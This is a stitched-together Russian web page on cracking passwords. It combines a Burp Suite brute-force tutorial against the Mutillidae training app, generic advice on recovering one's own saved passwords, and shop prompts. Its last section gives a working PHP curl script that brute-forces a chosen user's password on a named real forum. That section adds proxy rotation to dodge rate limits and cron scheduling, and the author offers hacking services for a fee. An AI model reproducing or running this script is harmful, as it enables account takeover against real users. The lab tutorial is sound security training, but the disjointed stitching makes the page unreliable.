Как найти пароль на форуме

Как подобрать пароль к аккаунту/странице/сайту

Друзья, всех приветствую!

В этой статье мы поговорим о том, как подбирать пароли к учетным записям, сайтам, страницам, аккаунтам с помощью Burp Suite.

Аутентификация лежит в основе защиты приложения от несанкционированного доступа. Если злоумышленнику удастся нарушить функцию аутентификации приложения, то он сможет завладеть всем приложением.

В следующем примере демонстрируется техника обхода аутентификации с использованием имитированной страницы входа в систему из учебного инструмента «Mutillidae». Версия «Mutillidae», которую мы используем, взята из проекта OWASP «Broken Web Application Project». Скачать проект BWAP вы можете здесь.

Во-первых, убедитесь, что Burp Suite правильно настроен в вашем браузере. Во вкладке Burp Proxy убедитесь, что «Перехват выключен» («Intercept is off») и посетите страницу входа (login page) в WEB-приложение, которое вы тестируете в вашем браузере.

Вернитесь в Burp Suite. На вкладке Proxy «Intercept» убедитесь, что «Intercept is on».

В браузере введите произвольные данные на странице входа и отправьте запрос.

Перехваченный запрос можно просмотреть на вкладке Proxy «Intercept». Щелкните правой кнопкой мыши на запросе, чтобы вызвать контекстное меню. Затем нажмите «Send to Intruder».

Перейдите на вкладку Intruder «Positions». Очистите предварительно установленные позиции, используя кнопку «Clear» справа от редактора запросов. Добавьте значения параметров «username» и «password» в качестве позиций, выделив их и используя кнопку «Add». Измените атаку на «Cluster bomb», используя выпадающее меню «Attack type».

Перейдите на вкладку «Payloads». В настройках «Payload sets» убедитесь, что «Payload set» равен «1», а «Payload type» установлен на «Simple list». В настройках «Payload options» введите несколько возможных имен пользователей. Вы можете сделать это вручную или использовать предварительно установленный список username.

Затем в настройках «Payload Sets» измените значение параметра «Payload» на «2». В настройках «Payload options» введите несколько возможных паролей. Вы можете сделать это так же вручную или использовать предварительно установленный список паролей. Далее нажмите кнопку «Начать атаку».

В окне «Intruder attack» вы можете сортировать результаты, используя заголовки столбцов. В данном примере сортировка производится по длине («Content-Length») и по статусу.

Теперь таблица предоставляет нам некоторые интересные результаты для дальнейшего исследования. Просматривая ответ в окне атаки, мы видим, что запрос 118 вошел в систему под именем «admin».

Чтобы подтвердить успешность «брутфорса», используйте имя пользователя и пароль на странице входа в веб-приложение.

В некоторых случаях перебор на странице входа в систему может привести к тому, что приложение заблокирует учетную запись пользователя. Это может быть связано с политикой блокировки, основанной на определенном количестве неудачных попыток входа в систему и т.д. Хотя такая политика разработана для защиты учетной записи, она может привести к дополнительным уязвимостям. Злоумышленник может заблокировать несколько учетных записей, лишив пользователей доступа к ним. Кроме того, заблокированная учетная запись может вызвать изменения в «поведении» web-приложения, и это поведение должно быть изучено и потенциально использовано.

Всем спасибо за внимание!

Подписывайтесь на меня в соц. сетях, буду всем рад!

Как узнать пароли пользователей моего форума?

Как узнать пароль сохраненный в браузере?

Купить сейчас

1. Переходим во вкладку «Настройки»

   

2. Для быстрого поиска раздела с информацией рекомендуем в поиске настроек ввести «пароли»

   

3. После окончания поиска появится вкладка «Сохраненные пароли», где находятся все данные о ранее вводимых авторизационных сведениях.

Таким образом, ответ на вопрос как узнать пароль если он сохранен полностью раскрыт на странице восстановления доступа.

Если при использовании данного метода возникли трудности, рекомендуем ознакомиться с обучающими видеороликами по теме на видеохостинге YouTube, где наглядно продемонстрированы перечисленные шаги определения сохраненного логина.

Как узнать пароль если забыл логин?

Важно! Для избегания ситуаций с восстановлением доступа, при регистрации новых «учеток» рекомендуем делать скриншоты либо пометки в «записки» смартфона.

Как узнать пароль если забыл почту?

Если же Вы регистрировали свой кабинет с помощью почтового ящика, доступа к которому у Вас сейчас нет, то в таком случае рекомендуем выполнить следующие шаги:

• Восстановить доступ с помощью ввода защитного кода (данный код можно получить на номер мобильного телефона, указанного при регистрации)
• Ответить на секретный вопрос и сменить логин
• Связаться с администратором и предоставить ему все необходимые данные

Если для защиты своей почты Вы использовали секретный вопрос, ответ на который Вы сейчас не помните, выполните следующие действия:

• Смените раскладку на клавиатуре
• Включите или выключите «Caps Lock»
• Используйте разные варианты транслитерации

После нескольких неудачных попыток Вам будет предложено связаться со службой поддержки, сотрудники которой более подробно объяснят, как узнать пароль и вернуть доступ к личному кабинету.

Как узнать забытый пароль на телефоне?

1. Мобильные версии браузеров также имеют функцию сохранения паролей, поэтому если она была включена в момент Вашей авторизации, то восстановить доступ не составит труда: 1) для начала перейдите в настройке браузера

   

   2) далее переместитесь в раздел «пароли», где во вкладке «список паролей» Вы можете найти нужные авторизационные данные

   

2. Если Вы используете браузер под учетной записью, то для доступа к списку данных Вам придется повторить ввод пароля от аккаунта.

   Важно! Функция автосохранения паролей работает только на тех сайтах и сервисах, где Вы разрешаете использовать данную возможность. В остальных случаях функция не запускается, что делает невозможным восстановление данных через браузер.

Данный способ подходит только для ответа на вопрос как узнать сохраненный пароль, в то время как без функции автосохранения получить доступ к забытому аккаунту будет намного сложнее.

Первым делом рекомендуем использовать стандартную форму восстановления, которая может помочь пользователям, которые прикрепляют к учетной записи активный почтовый ящик или действующий номер телефона.

Важно! В крайнем случае, когда восстановить аккаунт не получается ни одним из перечисленных способов, а заводить новую учетную запись не требуется, обратитесь за помощью в офис разработчика сервиса, либо подготовьте заказное письмо со всеми необходимыми данными.

Шаблон подобного письма можно найти на официальных сайтах сервиса, в разделе «безопасность» и «поддержка».

Купить сейчас

Узнайте как правильно оформить заказ на нашем сайте!

Как узнать пароль пользователя на сайте на примере япа

Внимание! Автор статьи не несет никакой ответственности за действия читателей и предупреждает, что неправомерный доступ к информации незаконен! Данная статья выложена исключительно с целью ознакомления с одним из способов взлома веб сайтов и не может служить руководством к реальному действию. Материал предназначен для начинающих веб разработчиков, чтобы они могли примерно представлять себе мысли взломщика хакера и успешно противостоять взлому: создавать эффективную защиту от подбора паролей.

Преподаватели в университете говорят, что лучше всего учиться на примере. Запоминание и осмысление информации гораздо лучше происходит, если сухая теория разбавляется живой демонстрацией. Именно так мы и поступим в данном случае: разберем алгоритм доступа к паролю пользователя на примере сайта Яплакаль. В своем примере мне понадобится следующее:

• Хостинг с возможностью исходящих соединений;
• язык PHP;
• поддержка Curl с отправкой POST;
• файл с паролями (или словарь);
• Cron;
• подключение и парсинг прокси (опционально).

Примечание: полное решение задачи по взлому сайта (с подробностями) я выкладывать не буду – специалист сам разберется, а для начинающих хакеров есть другие ресурсы. Или услуги специалиста

Исследуем форму авторизации

Предположим, что мы определили цель – имеем логин пользователя. Нам требуется узнать, с помощью какого пароля он заходит на сайт. Если мы посмотрим на главную страницу сайта (откроем её исходный код), то увидим, что форма авторизации отсылает данные POST-запроса на страницу с адресом «//www.yaplakal.com/act/Login/CODE/01/». При этом, помимо двух основных полей (логин и пароль) отсылаются еще скрытые поля, но, скажу сразу – они не имеют значения для подбора пароля.

Получаем и обрабатываем страницу

Создадим функцию получения веб-страниц с помощью Curl — get_page:

function get_page($url, $uagent, $us, $pas )
{
  $ch = curl_init($url);

  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   
  curl_setopt($ch, CURLOPT_HEADER, 0);           
  curl_setopt($ch, CURLOPT_ENCODING, "");       
  curl_setopt($ch, CURLOPT_USERAGENT, $uagent);  
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120); 
  curl_setopt($ch, CURLOPT_TIMEOUT, 120);        
  curl_setopt($ch, CURLOPT_MAXREDIRS, 10);       
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, "UserName=".$us."&PassWord=".$pas);
 
  $content = curl_exec( $ch );
  $err     = curl_errno( $ch );
  $errmsg  = curl_error( $ch );
  $header  = curl_getinfo( $ch );
  curl_close( $ch );

  $header['errno']   = $err;
  $header['errmsg']  = $errmsg;
  $header['content'] = $content;
  return $header;
}

Ничего необычного вы здесь не увидите. Функция принимает на вход 4 параметра (адрес, юзер агент, логин и пароль), а на выходе выдает страницу. Пожалуй, советую обратить внимание только на строки 12 и 13: в них мы определяем, что не просто устанавливаем исходящее соединение, а еще и добавляем в curl параметр Post. Получаемую страницу мы обрабатываем с помощью такой процедуры:

$addr = "http://www.yaplakal.com/act/Login/CODE/01/";
$lines = file('http://site.com/pass.txt');
$us = "логин";
$uagent ="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";

for ($i=0;$i<1000;$i++) {
$pas= rtrim(str_replace("n", "", $lines[$i])); //убираем знак перехода и возможный пробел сначала
	
$result = get_web_page($addr, $uagent, $us, $pas);
if (($result['errno'] != 0 )||($result['http_code'] != 200))
    {
	echo $result['errmsg'];
	}
else
	{
	$page = $result['content'];

if (substr_count($page, "Неверный пароль")<1)	//проверяем сколько раз встречается строка в странице
{
echo "Пароль:".$pas;
die();	
}
}
}

Здесь все до безобразия просто: читаем файл с паролями в массив и пробуем. 1000 раз. Если в ответ выдается страница, в которой отсутствует фраза «Неверный пароль», то прекращаем работу скрипта и выводим на экран подошедший пароль.

Файл с паролями

Интересный момент: а что это за файл pass.txt? Это файл с паролями. Для брутфорса существуют специальные словари, с помощью которых хакеры подбирают пароли. Зачем они нужны? Дело в том, что действую просто перебором, мы даже в самом маленьком пароле для япа (минимальная длина – 8 символов) получаем 256289062500000000 вариантов. Многовато, не правда ли?

Словари с паролями можно составить и самостоятельно. Например, в одной своей статье я показывал самые популярные пароли для mail.ru – можно взять их – в
файле почти 200 тысяч паролей.

Однако, стоит отметить, что перед взломщиком здесь встает проблема: за один раз даже 200 тысяч паролей не получится обработать. Во-первых, на каждом хостинге стоит ограниченное время исполнения php-скрипта – ресурсы сервера ограничены. Кроме этого, на каждом уважающем себя сайте стоит хотя бы минимальная защита от такого грубого брутфорса. Например, интернет магазины часто ставят ограничение на количество подключающихся ip в сутки – 2000 запросов хватает обычному пользователю, а не занимающемуся парсингом сайта.

Прокси

Второе затруднение мы можем обойти с помощью прокси. Например, можно брать бесплатные прокси тут. С помощью того же curl просто парсить эту страничку и подставлять полученный ip и порт. Только придется затем немного доработать нашу функцию get_page – добавить пару строк:

curl_setopt ($ch, CURLOPT_PROXY, "202.153.130.214:80"); 
curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);

В первой адрес и порт прокси, а во второй указываем тип.

Однако, бесплатные прокси не панацея – нередко, даже с уже опробованными браузер может выдать вот такое:

Да и первая проблема никуда не делась – время работы скрипта не уменьшилось. Обойти эту проблему можно с помощью запуска скрипта по расписанию.

Cron

На всех платных хостингах, в том числе и на моем, есть возможность запускать скрипты по расписанию. Зададим, например, выполнение нашего скрипта раз в час:

Сама строка сценария (пример):

/usr/bin/php5.6 /home/u/up/upread.ru/cron.php

Тут «/usr/bin/php5.6» — это интерпретатор, «/home/u/up/»— путь до домашней директории (вам надо будет определить его самостоятельно на своем хостинге), а «upread.ru/cron.php» — это уже непосредственно скрипт, который будет подбирать пароли.

Небольшие доработки

Наш скрипт подбора требуется немного доработать. Надо сделать так, чтобы данные куда-то записывались – или в базу данных или в файл. Это несложно, поэтому я пропускаю подробности. Алгоритм тут такой: в конце работы скрип, когда закончит проверять очередную партию паролей, просто записывает номер строки последнего – а файл cron.php через определенное время начинает уже со следующей по порядку.

Итог

Для сайта пациента (яп) параметры на данный момент оказались такими: сайт выдерживает до 1000 запросов со одного ip каждые полчаса. То есть, по 2000 в час или 48 тысяч в сутки. На самом деле это неплохие параметры – обычно защита гораздо строже. Это значит, что наш файл с самыми распространенными паролями от mail.ru проверится полностью меньше, чем за 4 суток. А если взять файл с 16 миллионами паролей? На это с помощью одного потока уйдет более 300-х суток! Однако, так как это выполняет сервер, то вам то какая разница? Плюс подключить десяток прокси – и через месяц с большой вероятностью у вас будет пароль от нужного аккаунта.

Дополнение

Стоит отметить, что взломщики аккаунтов (подборщики паролей) нередко действуют по другой схеме: они парсят с сайта имена (логины) пользователей и с помощью самостоятельно составленного словаря паролей подбирают к ним. То есть атака идет на кого-то конкретного, а «широким фронтом».

В заключение хочу еще раз повторить, что информация предоставлена исключительно для законопослушных веб-мастеров и пользователей, заботящихся о собственной безопасности. Если у вас есть какие-либо вопросы, то я с удовольствием на них отвечу – за небольшое вознаграждение. Напишу любую программу или создам сайт.

Автор этого материала — я — Пахолков Юрий. Я оказываю услуги по написанию программ на языках Java, C++, C# (а также консультирую по ним) и созданию сайтов. Работаю с сайтами на CMS OpenCart, WordPress, ModX и самописными. Кроме этого, работаю напрямую с JavaScript, PHP, CSS, HTML — то есть могу доработать ваш сайт или помочь с веб-программированием. Пишите сюда.

статьи IT, php, curl, пароли, POST-запрос